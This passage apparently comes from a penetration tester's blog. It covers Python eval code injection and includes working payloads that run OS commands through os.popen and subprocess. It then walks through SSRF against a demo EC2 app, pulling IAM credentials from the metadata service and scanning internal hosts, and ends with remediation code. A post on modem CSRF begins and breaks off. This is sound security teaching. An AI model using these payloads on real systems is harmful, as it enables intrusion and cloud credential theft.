<a href="https://1.bp.blogspot.com/-j6-c5W936fE/WBJWxCAYYQI/AAAAAAAABH8/tZQjIxvA-QI9QH3cGB3MitvOQtbGOri6gCEw/s1600/pyinject-burpfindings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://1.bp.blogspot.com/-j6-c5W936fE/WBJWxCAYYQI/AAAAAAAABH8/tZQjIxvA-QI9QH3cGB3MitvOQtbGOri6gCEw/s400/pyinject-burpfindings.png" width="381" /></a></div>
<br />
<br />
Here are the details showing the payload that Burp used to find this vulnerability:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-oeFiNf-CiS4/WBJWxOBzcwI/AAAAAAAABIA/o1UpHK7zn9A76OTX70PqzQamDJCOutU3gCEw/s1600/pyinject-findingdetails.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://3.bp.blogspot.com/-oeFiNf-CiS4/WBJWxOBzcwI/AAAAAAAABIA/o1UpHK7zn9A76OTX70PqzQamDJCOutU3gCEw/s640/pyinject-findingdetails.png" width="640" /></a></div>
<br />
The reason Burp flags the app as vulnerable is that after it sent this payload, which told the interpreter to sleep for 20 seconds, the response took 20 seconds to come back. As with any time-based vulnerability check, there are occasional false positives, usually because the app in general starts responding slowly. <br />
<br />
<div>
<div>
<h2>
Moving from POC to Targeted Exploitation</h2>
<span style="font-family: inherit;">While time.sleep is a nice way to confirm the vulnerability, we want to execute OS commands AND receive the output. To do that, we had success with </span>os.popen(), subprocess.Popen(), and subprocess.check_output(), and I'm sure there are others.<br />
<br />
The Burp Suite Pro payload uses a clever hack (using compile) that is required if you have multiple statements, as eval can only evaluate expressions. There is another way to accomplish this, using global functions (ex: __import__), which is explained <a href="http://www.floyd.ch/?p=584">here</a> and <a href="http://vipulchaskar.blogspot.com/2012/10/exploiting-eval-function-in-python.html">here</a>.<br />
<br />
This payload should work in most cases:
<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b># Example with one expression</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">__import__('os').popen('</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><b># Example with multiple expressions, separated by commas</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">str("-"*50),__import__('os').popen('</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
If you need to execute a statement, or multiple statements, you will have to use eval/compile:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b># Examples with one expression</b></span><br />
<br />
<ul>
<li><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""__import__('os').popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()""",'','single'))</span></b></li>
<li><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""__import__('subprocess').check_output(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">',shell=True)""",'','single'))</span></b></li>
</ul>
<b>
<span style="font-family: "courier new" , "courier" , monospace;"># Examples with multiple statements, separated by semicolons</span></b><br />
<br />
<ul>
<li><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""__import__('os').popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read();import time;time.sleep(2)""",'','single'))</span></b></li>
<li><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""__import__('subprocess').check_output(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">',shell=True);import time;time.sleep(2)""",'','single'))</span></b></li>
</ul>
<br />
In my testing, some things just did not work with the global __import__ trick above, like using subprocess.Popen. In that case, just stick with the for loop technique that the Burp team came up with:<br />
<br />
<ul>
<li><b><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""for x in range(1):\n import os\n os.popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()""",'','single'))</span></b></b></li>
<li><b><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))</span></b></b></li>
<li><b><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">',shell=True)""",'','single'))</span></b></b></li>
</ul>
<br />
If your vulnerable parameter is a GET parameter, you can exploit this easily with just your browser: </div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-JWF6W9Hkdsc/WBN7VtHoubI/AAAAAAAABJU/BKj7HF2tltAfhPyJ3B13vmrtaMIEeGWAgCEw/s1600/pyinject-browser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://4.bp.blogspot.com/-JWF6W9Hkdsc/WBN7VtHoubI/AAAAAAAABJU/BKj7HF2tltAfhPyJ3B13vmrtaMIEeGWAgCEw/s640/pyinject-browser.png" width="640" /></a></div>
<br />
Note: The browsers do most of the required URL encoding for you, but you will have to manually encode semicolon (%3b) and spaces (%20) if they are used, or use the tool we developed which is covered below.<br />
<br />
If you are working with a POST parameter (or a cookie value, which was the case on my pentest), you'll probably want to use Burp Repeater or something similar. This next series of screenshots shows me using subprocess.check_output() to call pwd, ls -al, whoami, and ping, all in one expression:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-wGjxPgP0SUc/WBt5ZUF9gCI/AAAAAAAABKE/wXobCpjPpaIoMbDrSf5MBuHynlsZPUp2QCLcB/s1600/pyinject-post-repeater.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="395" src="https://1.bp.blogspot.com/-wGjxPgP0SUc/WBt5ZUF9gCI/AAAAAAAABKE/wXobCpjPpaIoMbDrSf5MBuHynlsZPUp2QCLcB/s640/pyinject-post-repeater.png" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-gqnpwg0dKTk/WBt5ZS5hArI/AAAAAAAABKA/hkY0RnSySaUQ8jR22nH8Njwj6yoPw_cJACEw/s1600/pyinject-post-repeater-response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="514" src="https://3.bp.blogspot.com/-gqnpwg0dKTk/WBt5ZS5hArI/AAAAAAAABKA/hkY0RnSySaUQ8jR22nH8Njwj6yoPw_cJACEw/s640/pyinject-post-repeater-response.png" width="640" /></a></div>
<br />
Manually URL encoding characters gets old fast, so you will probably find yourself wanting to whip up a python script to send the requests from the command line, like Charlie and I did. Or, if you'd like, you can use ours.<br />
<br /></div>
<div>
<h2>
Exploitation Demonstration with PyCodeInjectionShell</h2>
</div>
<div>
You can download PyCodeInjectionShell, and read up on how to use it here: <a href="https://github.com/sethsec/PyCodeInjection">https://github.com/sethsec/PyCodeInjection</a>. PyCodeInjectionShell is written to feel like sqlmap as much as possible. Our assumption is that anyone who needs to use this tool is probably very familiar with sqlmap. <br />
<br />
Here is what it looks like in action, accepting a URL. Note the sqlmap style <b>*</b> designating the payload placement in the URL. This example also uses interactive mode, which lets you continuously enter new commands until you exit:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-F-l5jXdBdf8/WBt9GwQA-5I/AAAAAAAABKY/PIl1E-XSvSY_xkmJ_Ru2OOuVc0XiL_KBACLcB/s1600/PyCodeInjectionShell-url-interactive.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://2.bp.blogspot.com/-F-l5jXdBdf8/WBt9GwQA-5I/AAAAAAAABKY/PIl1E-XSvSY_xkmJ_Ru2OOuVc0XiL_KBACLcB/s640/PyCodeInjectionShell-url-interactive.png" width="578" /></a></div>
<br />
And here is the same functionality using a request file copy/pasted from burp repeater, with an implanted *, which tells the tool where to inject:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-ZAvl7DJBC_U/WCDFCplFG-I/AAAAAAAABK4/Qy5xX3Ozk5MXxqCA6pGcekpDfGQ3cNqIgCLcB/s1600/PyCodeInjectionShell-request-interactive1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://4.bp.blogspot.com/-ZAvl7DJBC_U/WCDFCplFG-I/AAAAAAAABK4/Qy5xX3Ozk5MXxqCA6pGcekpDfGQ3cNqIgCLcB/s640/PyCodeInjectionShell-request-interactive1.png" width="640" /></a></div>
<div>
<br /></div>
<br />
In either example, if you just want to enter one command and exit, just remove the -i. <br />
<br /></div>
<div>
Feedback, suggestions, questions and bug reports are welcome!</div>
<a href="http://www.blogger.com/profile/05253599496757968918">Seth Art</a><br />
<h1>
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)</h1>
Published 2015-12-23, updated 2015-12-28<br />
<br />
I recently came across a Server Side Request Forgery (SSRF) vulnerability within an application that I assessed. The application was hosted on Amazon EC2 and was using Node.js, Express.js, and as I found out later, Needle.js.<br />
<br />
<h2>
Discovery</h2>
<h3>
Manual Discovery</h3>
In the discovery phase, I noticed a function of the application that was taking a user specified URL and displaying the first paragraph from that URL into the page. This application allowed a user to share a URL with their friends, and grabbing the first paragraph was a feature that would provide the friends with more context.<br />
<br />
The thing is, when looking at my Burp history, I could not find the request to the URL that I specified in my logs. This should raise an eyebrow! <b>This means that the server is taking the URL I specified, making a request on my behalf, and then returning the result to me. That right there is SSRF</b>. Then, the only question was: What is the risk?<br />
<br />
<h3>
Automated Discovery</h3>
Since April 2015, if you are using the <a href="http://blog.portswigger.net/2015/04/introducing-burp-collaborator.html">Burp Collaborator</a> (and you definitely should be), you should be able to detect SSRF if you send the vulnerable request to the active scanner. The following image shows a few different ways Burp Collaborator can identify SSRF (as Out-of-band resource load and External service interaction).<br />
<br />
<a href="http://4.bp.blogspot.com/-PiTGn02cgZw/VnrDCk5FnaI/AAAAAAAABCU/QAV6Z0uAvqo/s1600/burp-collaborator1.png" imageanchor="1"><img border="0" height="166" src="http://4.bp.blogspot.com/-PiTGn02cgZw/VnrDCk5FnaI/AAAAAAAABCU/QAV6Z0uAvqo/s400/burp-collaborator1.png" width="400" /></a><br />
<h2>
Exploitation Demonstration</h2>
I wanted to demonstrate this SSRF vulnerability without sharing any details about the assessed application. To do this, I re-created the vulnerability by somehow hacking together my first Node.js application (and it actually worked).<br />
<br />
Source: <a href="https://github.com/sethsec/Nodejs-SSRF-App">https://github.com/sethsec/Nodejs-SSRF-App</a><br />
<br />
My application, which for this demo is hosted on an Amazon EC2 micro instance, runs Node.js, and uses Express.js and Needle.js (which is what makes the SSRF request). <br />
<br />
Just as the real application did, my demo application takes a URL specified by the user, and makes a request using Needle.js. The real application accepted the user supplied URL from a JSON parameter in the BODY, however my Node skills are not there yet, so for my demo the URL is sent via a GET parameter.<br />
<br />
This is the most pertinent part of the vulnerable app:<br />
<br />
<a href="http://2.bp.blogspot.com/-6AUR9KcOWBs/VncJbe2j08I/AAAAAAAABBI/RkL_mGg5RKE/s1600/vulnapp1.png" imageanchor="1"><img border="0" height="170" src="http://2.bp.blogspot.com/-6AUR9KcOWBs/VncJbe2j08I/AAAAAAAABBI/RkL_mGg5RKE/s640/vulnapp1.png" width="640" /></a><br />
<br />
This is what it looks like in action:<br />
<br />
<a href="http://2.bp.blogspot.com/-pnQhAh60yaw/Vmc8PzsZaQI/AAAAAAAAA8Y/eepoBjQfBks/s1600/ssrf%2B-%2Bsethsec.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="377" src="http://2.bp.blogspot.com/-pnQhAh60yaw/Vmc8PzsZaQI/AAAAAAAAA8Y/eepoBjQfBks/s640/ssrf%2B-%2Bsethsec.png" width="640" /></a><br />
<br />
<br />
<br />
It looks just like an iframe, doesn't it? But if it were a typical iframe, your browser would be making the request to sethsec.blogspot.com, and the application would not be vulnerable to SSRF.<br />
<br />
However, when I ask the vulnerable server to make a request to ifconfig.pro, a site that shows the IP Address and User Agent of the requester, I can confirm the SSRF pretty clearly:<br />
<br />
<div style="text-align: center;">
<div style="text-align: left;">
<a href="http://3.bp.blogspot.com/-1kbAnM6UQbI/VmnFOzzIGRI/AAAAAAAAA80/2ighuUBUUTU/s1600/ssrf%2B-%2Bsource%2BIP%2Band%2Buser%2Bagent.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="281" src="http://3.bp.blogspot.com/-1kbAnM6UQbI/VmnFOzzIGRI/AAAAAAAAA80/2ighuUBUUTU/s640/ssrf%2B-%2Bsource%2BIP%2Band%2Buser%2Bagent.png" width="640" /></a></div>
</div>
<br />
<br />
The two most interesting items are the source IP and the User_Agent. This response from ifconfig.pro proves that the request was sent by the EC2 instance, specifically from Needle, a Node.js HTTP client.<br />
<br />
<h3>
Who cares? What is the risk? </h3>
Well, as mentioned above and discovered by many excellent researchers, if you can get the server to make a request for you, you can often gain access to things you otherwise would not have the ability to access.<br />
<br />
<h3>
Accessing the Amazon EC2 Metadata Service</h3>
For example, if your application is running on an Amazon EC2 instance, you can query the instance metadata service at 169.254.169.254 (a non-routable address). This service is ONLY accessible via the instance itself, so without SSRF, command injection, or something similar, you would never be able to reach this service.<br />
<br />
<div style="text-align: left;">
<a href="http://1.bp.blogspot.com/-aBcrCk2kEMg/VnOOdw_wA2I/AAAAAAAAA_Q/P7_0Hww-nQc/s1600/ssrf3.png" imageanchor="1"><img border="0" height="296" src="http://1.bp.blogspot.com/-aBcrCk2kEMg/VnOOdw_wA2I/AAAAAAAAA_Q/P7_0Hww-nQc/s640/ssrf3.png" width="640" /></a></div>
<div style="text-align: right;">
<br /></div>
<br />
This is just one example of a metadata object. Erik Peterson (<a href="https://twitter.com/silvexis">@silvexis</a>) covers much more sensitive things that can potentially live in the metadata service in his excellent talk <a href="https://www.youtube.com/watch?v=JTOWxi17k-w">Bringing a Machete to the Amazon</a>. For example, this next request allows an attacker to retrieve the temporary security credentials for the "admins" role, which would allow an attacker to control access to your AWS resources. <br />
<br />
<br />
<div style="text-align: center;">
<div style="text-align: left;">
<a href="http://4.bp.blogspot.com/-wDyr_VXFzHc/VmnJc1xVziI/AAAAAAAAA9M/qxkKRXWzr5U/s1600/ssrf%2B-%2Bsecurity%2Bcredentials2.png" imageanchor="1"><img border="0" height="371" src="http://4.bp.blogspot.com/-wDyr_VXFzHc/VmnJc1xVziI/AAAAAAAAA9M/qxkKRXWzr5U/s640/ssrf%2B-%2Bsecurity%2Bcredentials2.png" width="640" /></a></div>
</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
<h3>
Accessing the Amazon EC2 User Data Object</h3>
Another place you will want to look is the user-data container, located at: http://169.254.169.254/latest/user-data. Amazon gives the following warning to devs:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-76_sFKHPGTI/Vm4v-ajmUqI/AAAAAAAAA-A/Mrq3v7TcKAY/s1600/2015-12-13%2B21_56_15-Instance%2BMetadata%2Band%2BUser%2BData%2B-%2BAmazon%2BElastic%2BCompute%2BCloud.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="114" src="http://4.bp.blogspot.com/-76_sFKHPGTI/Vm4v-ajmUqI/AAAAAAAAA-A/Mrq3v7TcKAY/s640/2015-12-13%2B21_56_15-Instance%2BMetadata%2Band%2BUser%2BData%2B-%2BAmazon%2BElastic%2BCompute%2BCloud.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-add-user-data</td></tr>
</tbody></table>
<br />
But as we all know, if it is easier to store some passwords or other sensitive data in user-data, some people will, which is why you should check. This is what that request looks like from my vulnerable EC2 instance:<br />
<br />
<div style="text-align: center;">
<div style="text-align: left;">
<a href="http://1.bp.blogspot.com/-9Rm0IkO5wfQ/Vm4xGHYQTxI/AAAAAAAAA-Y/Fsc3kDV6Gls/s1600/ssrf%2B-%2Buserdata.png" imageanchor="1"><img border="0" height="312" src="http://1.bp.blogspot.com/-9Rm0IkO5wfQ/Vm4xGHYQTxI/AAAAAAAAA-Y/Fsc3kDV6Gls/s640/ssrf%2B-%2Buserdata.png" width="640" /></a></div>
</div>
<br />
For a complete list of what to look for if you have access to the EC2 metadata service, check out this document from Amazon: <a href="http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html" target="_blank">Instance Metadata and User Data</a>.<br />
<br /></div>
<div style="text-align: left;">
<h3>
Scanning and Accessing the Back End Infrastructure</h3>
In addition to checking the metadata service (and also looking for user data), you should try to exploit SSRF to look for services, hosts, and resources that are accessible via the vulnerable server, but not accessible to you directly. Burp Intruder is a great tool to accomplish each of these tasks.<br />
<h4>
Demo Setup</h4>
To set up for the demo, I am using a second EC2 instance running Kali, with an internal IP address of 172.31.40.122 and listening on port 8080. The web service on this host is not accessible from the Internet. In fact, the only connections allowed to 172.31.40.122 are from the internal IP address of the server that is vulnerable to SSRF, and only on port 8080/tcp.<br />
<br />
Here is the EC2 security policy for 172.31.40.122 (Kali running apache):<br />
<br />
<a href="http://2.bp.blogspot.com/-Cl9HNxU58eI/Vm417ImFhII/AAAAAAAAA-o/-BprlhY3K8E/s1600/2015-12-13%2B20_51_35-EC2%2BManagement%2BConsole.png" imageanchor="1" style="text-align: center;"><img border="0" height="216" src="http://2.bp.blogspot.com/-Cl9HNxU58eI/Vm417ImFhII/AAAAAAAAA-o/-BprlhY3K8E/s640/2015-12-13%2B20_51_35-EC2%2BManagement%2BConsole.png" width="640" /></a><br />
<h4>
Scanning for ports (XSPA)</h4>
<br />
1) Make the initial request through Burp. In this example, I just attempted to access TCP port 1.<br />
<br />
<a href="http://4.bp.blogspot.com/-4g4wBtKY0Ro/VnOXPagFk4I/AAAAAAAAA_g/8eiNWWSiUzM/s1600/xspa1.png" imageanchor="1"><img border="0" height="100" src="http://4.bp.blogspot.com/-4g4wBtKY0Ro/VnOXPagFk4I/AAAAAAAAA_g/8eiNWWSiUzM/s400/xspa1.png" width="400" /></a><br />
<br />
2) Send the initial request to Burp Intruder.<br />
<br />
<a href="http://2.bp.blogspot.com/-GvjEeN6LYR0/VnOXjJ3Ur-I/AAAAAAAAA_s/FU9rtEwA0-4/s1600/xspa2.png" imageanchor="1"><img border="0" height="130" src="http://2.bp.blogspot.com/-GvjEeN6LYR0/VnOXjJ3Ur-I/AAAAAAAAA_s/FU9rtEwA0-4/s400/xspa2.png" width="400" /></a><br />
<br />
3) Set the payload position (to the port).<br />
<br />
<a href="http://2.bp.blogspot.com/-lubZgpfg0uA/VnOX_Wu7SJI/AAAAAAAAA_4/x-R6MV71Gnw/s1600/xspa3.png" imageanchor="1"><img border="0" height="266" src="http://2.bp.blogspot.com/-lubZgpfg0uA/VnOX_Wu7SJI/AAAAAAAAA_4/x-R6MV71Gnw/s400/xspa3.png" width="400" /></a><br />
<br />
4) Set the payload itself. For the demo, I am selecting 11 sequential ports, but you could easily paste in the top X tcp ports from nmap or a list of common web server ports.<br />
<br />
<a href="http://3.bp.blogspot.com/-QjNdLo-cXxY/VnOYsziePUI/AAAAAAAABAE/fBFYpGSt7v8/s1600/xspa4.png" imageanchor="1"><img border="0" height="400" src="http://3.bp.blogspot.com/-QjNdLo-cXxY/VnOYsziePUI/AAAAAAAABAE/fBFYpGSt7v8/s400/xspa4.png" width="381" /></a><br />
<br />
5) Start the attack. As you can see from the screenshot below, there are a few potential ways to infer which port is open and which ports are closed. In this case, you can use the response code OR the length of the response:<br />
<br />
<a href="http://3.bp.blogspot.com/-sgNVV6XHOKA/VnOZmw3udFI/AAAAAAAABAc/eCQsAauQ9Ds/s1600/xspa5.png" imageanchor="1"><img border="0" height="355" src="http://3.bp.blogspot.com/-sgNVV6XHOKA/VnOZmw3udFI/AAAAAAAABAc/eCQsAauQ9Ds/s400/xspa5.png" width="400" /></a><br />
<br />
Alright! I just determined that 172.31.40.122 is listening on port 8080, and that it is running a web server.<br />
<h4>
Scanning for hosts</h4>
This follows the exact same steps as above, but instead of setting the port as the payload position, you would set the IP address range you want to scan, so that you are scanning a range of IP addresses for a particular port, like port 80/tcp or 443/tcp. <br />
<br />
It would look like this:<br />
<br />
<a href="http://1.bp.blogspot.com/--_zWmBpWTIY/VnOamLmfIhI/AAAAAAAABAo/ra4zBZgM99w/s1600/ssrf6.png" imageanchor="1"><img border="0" height="177" src="http://1.bp.blogspot.com/--_zWmBpWTIY/VnOamLmfIhI/AAAAAAAABAo/ra4zBZgM99w/s400/ssrf6.png" width="400" /></a><br />
<br />
I did not want to actually scan other EC2 IPs, so I'm just leaving this example here. But, basically, you pick back up again at step 4 and everything else is the same as above. <br />
<br />
You could also use the Cluster Bomb attack type in Burp and scan for ports and services at the same time.<br />
<h4>
<a href="http://1.bp.blogspot.com/-R_yGB-Uuj0c/VncoCW-mHrI/AAAAAAAABBk/FqJTFCNovxU/s1600/clusterbomb1.png" imageanchor="1"><img border="0" height="55" src="http://1.bp.blogspot.com/-R_yGB-Uuj0c/VncoCW-mHrI/AAAAAAAABBk/FqJTFCNovxU/s400/clusterbomb1.png" width="400" /></a></h4>
<h4>
Scanning the internal web server</h4>
Next, I'll show how we can once again repeat the process described above, but this time we'll scan for files and/or directories on a server, rather than scanning ports or hosts. <br />
<br />
As this is my demo, I know the target file is located at users.txt, but I threw a few other pages into Burp Intruder to show what this would look like. In a real world scenario, you would want to use a source of directories and file names from a resource like <a href="https://github.com/rustyrobot/fuzzdb" target="_blank">fuzzdb</a>.<br />
<div style="text-align: center;">
<br /></div>
Just like in the previous examples, you can find a match by looking for a difference. In this example, everything gives you a 200 status, but the length of users.txt is shorter than all of the others. This is your first clue that you found a file that exists. <br />
<br />
<a href="http://3.bp.blogspot.com/-vhIsDSVBFWo/VnOj6tNzEHI/AAAAAAAABA4/_y9bkteTSqs/s1600/ssrf-backend.png" imageanchor="1"><img border="0" height="640" src="http://3.bp.blogspot.com/-vhIsDSVBFWo/VnOj6tNzEHI/AAAAAAAABA4/_y9bkteTSqs/s640/ssrf-backend.png" width="545" /></a><br />
<br />
As with the ports and services example from above, you could also use the Cluster Bomb attack type in Burp to scan multiple web servers you have identified with the same file/directory list, all at the same time.<br />
<br />
<h2>
Remediation</h2>
Rather than proxying requests on behalf of users, the application should have the user’s browser retrieve the desired information. If it is necessary to proxy the request, a white list should be used on the server side and the User-Agent information should be stripped or modified.<br />
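As an added example (not the Nodejs-SSRF-App's code, and written in Python rather than Node), this is the server-side allowlist the Remediation section describes, combined with a resolution check that also refuses the 169.254.169.254 metadata-service and 172.31.x.x back-end requests shown earlier. The allowed hosts and the offline resolver answers are constructed so the code runs without network access.

```python
"""Added example (not the Nodejs-SSRF-App's code, in Python rather than
Node): validate a user-supplied URL before the server fetches it.
ALLOWED_HOSTS and OFFLINE_ANSWERS are constructed for this example."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Constructed allowlist: the only destinations the "share a link" feature needs.
ALLOWED_HOSTS = {"sethsec.blogspot.com", "www.example.com"}
METADATA_SERVICE = ipaddress.ip_address("169.254.169.254")


def default_resolver(host: str) -> list:
    """Every address the name maps to (A and AAAA), via the system resolver."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


# Constructed DNS answers so the example runs offline: 8.8.8.8 stands in for
# any public address, 172.31.40.122 is the demo's back-end Kali host.
OFFLINE_ANSWERS = {"sethsec.blogspot.com": ["8.8.8.8"],
                   "www.example.com": ["172.31.40.122"]}


def offline_resolver(host: str) -> list:
    try:
        return OFFLINE_ANSWERS[host]
    except KeyError:
        raise OSError(f"no answer for {host}") from None


def is_internal(addr: str) -> bool:
    """True for the metadata service, link-local, RFC 1918 (the 172.31.x.x
    VPC range in the demo), loopback and other non-routable addresses."""
    ip = ipaddress.ip_address(addr)
    return (ip == METADATA_SERVICE or ip.is_link_local or ip.is_private
            or ip.is_loopback or ip.is_reserved or ip.is_multicast
            or ip.is_unspecified)


def validate_fetch_url(url: str, resolver=default_resolver):
    """Return (ok, reason). The allowlist is the control; the resolution
    check is the backstop for an allowlisted name that points inward."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    if host.lower() not in ALLOWED_HOSTS:
        return False, "host not on allowlist"
    try:
        addrs = resolver(host)
    except OSError:
        return False, "host does not resolve"
    if not addrs or any(is_internal(a) for a in addrs):
        return False, "host resolves to an internal address"
    # Caveats for the fetch itself: connect to the address just validated
    # rather than resolving again (DNS rebinding), re-validate before
    # following any redirect, and send a fixed User-Agent instead of the
    # HTTP client's default, as the Remediation section advises.
    return True, "ok"
```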
<h2>
Additional Resources</h2>
</div>
<div style="text-align: left;">
There are several great SSRF resources out there. In my opinion, Nicolas Grégoire (<a href="https://twitter.com/Agarri_FR">@Agarri_FR</a>) is the master of SSRF (and XXE), so if you have not read up on much about either, you need to check out some of his blog posts and talks.<br />
<br />
One of my favorite talks: <a href="https://www.youtube.com/watch?v=mQjTgDuLsp4">Nicolas Grégoire - Hunting for Top Bounties</a><br />
One of my favorite blog posts: <a href="http://www.agarri.fr/kom/archives/2013/11/27/compromising_an_unreachable_solr_server_with_cve-2013-6397/index.html">Compromising an unreachable Solr server with CVE-2013-6397</a><br />
<br />
I decided to blog about this because I just submitted a <a href="https://github.com/sethsec/cfdb/blob/master/Web/Server-Side%20Request%20Forgery.md" target="_blank">SSRF finding</a> as a pull request to Mubix's <a href="https://github.com/mubix/cfdb/" target="_blank">Common Findings Database Project</a> (CFDB). That finding has some of the same content I included here. In the CFDB finding, I include a bunch of links to prior work as well as some useful resources. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I think CFDB is a great project, and sorely needed at this point in our industry. I urge anyone who can contribute to do so. </div>
<div style="text-align: left;">
<br /></div>
<h2>
Final Thoughts</h2>
<div>
Unlike client-side vulnerabilities such as XSS and CSRF, SSRF can potentially give you access to back-end infrastructure that you would not otherwise be able to reach. Keep an eye out for it, and if you do find it, remember to demonstrate the risk. <br />
<br />
Did I miss the mark on anything? Was I inaccurate? Was this post helpful to you? Feedback is welcome and encouraged!</div>
<div style="text-align: left;">
<br />
<br /></div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com3tag:blogger.com,1999:blog-5890567984672491244.post-334540983797081212014-12-23T11:24:00.000-05:002014-12-29T22:45:08.202-05:00Forging my way into an XFinity home network via the Arris TG862G<br />
<b>TL;DR: </b>Using login CSRF + multi-stage CSRF, you can create a one-click exploit that silently logs a user into their vulnerable, Comcast-provided modem/router with the default credentials (if they have not been changed) and then enables remote management (or anything else). I'll show how I did this with my previously vulnerable modem/router, and then give a more generic POC that you can try out on bWAPP, an intentionally vulnerable web application. <br />
<h2>
Unnecessary Background</h2>
This story starts about a year ago when my colleagues convinced me to stop being lazy and switch to a DOCSIS 3.0 modem so that I could actually get the speeds I am paying for. I filled out the Comcast XFinity form and had them send me a new modem. New toy -- Yay!<br />
<br />
So basically right after I had the new device working, I decided it was time to mess around. Turns out the modem is an <a href="http://www.amazon.com/ARRIS-Residential-Gateway-GigaPort-TG862G-CT/dp/B00NR1EHP8/ref=sr_1_2?ie=UTF8&qid=1415214702&sr=8-2&keywords=arris+tg862g" target="_blank">Arris TG862G</a>, a modem that is designed to be re-branded by many ISPs and distributed to their customers. Unfortunately, as is common with SOHO devices, the modem was universally vulnerable to CSRF (and some XSS as well).<br />
<br />
<a href="http://seclists.org/fulldisclosure/2014/Dec/57">CVE-2014-5437: Cross-site request forgery</a><br />
<a href="http://seclists.org/fulldisclosure/2014/Dec/58">CVE-2014-5438: Cross-site Scripting</a><br />
<h2>
How bad can it be?</h2>
Before sending off the vulnerability report to Arris though, I figured I would try to dream up a worst case scenario, just like I do at my <a href="http://bluecanopy.com/">day job</a>.<br />
<br />
One of the toughest conditions to meet in the exploitation of most CSRF vulnerabilities is that the victim needs to be authenticated with the vulnerable application. If you are talking about an application with a huge inactivity timeout -- or one that you can be fairly confident the victim will be authenticated with (Google, Facebook, etc), this is not a problem. For an application that users are rarely logged into, the likelihood that your attack will be successful goes way down. <br />
<br />
Well, as I was thinking about exploitation scenarios, I remembered that this device ships with a standard IP address and uses a default username/password that does not need to be changed, even after the first login. I'd love to see the percentage of customers who have ever even logged into the management console once, let alone changed the default password. <br />
<br />
See where I am headed? Login-CSRF.<br />
<br />
Ultimately, what we need to do is create a CSRF exploit that causes our victim to issue multiple forged requests to the vulnerable application, in order.<br />
<br />
<b>1) </b>Attempt to log the victim in with the default credentials (Login-CSRF)<br />
<b>2) </b>Seamlessly execute the intended CSRF attack(s) without requiring more user interaction<br />
<br />
<h3>
Login-CSRF background</h3>
The malicious use case for "Login-CSRF" that is most commonly cited is <a href="http://www.adambarth.com/papers/2008/barth-jackson-mitchell-b.pdf">tricking your victim to log in with your credentials</a> in order to launch an exploit or socially engineer them further. <br />
<br />
What I needed is slightly different, not new, and described below:<br />
<br />
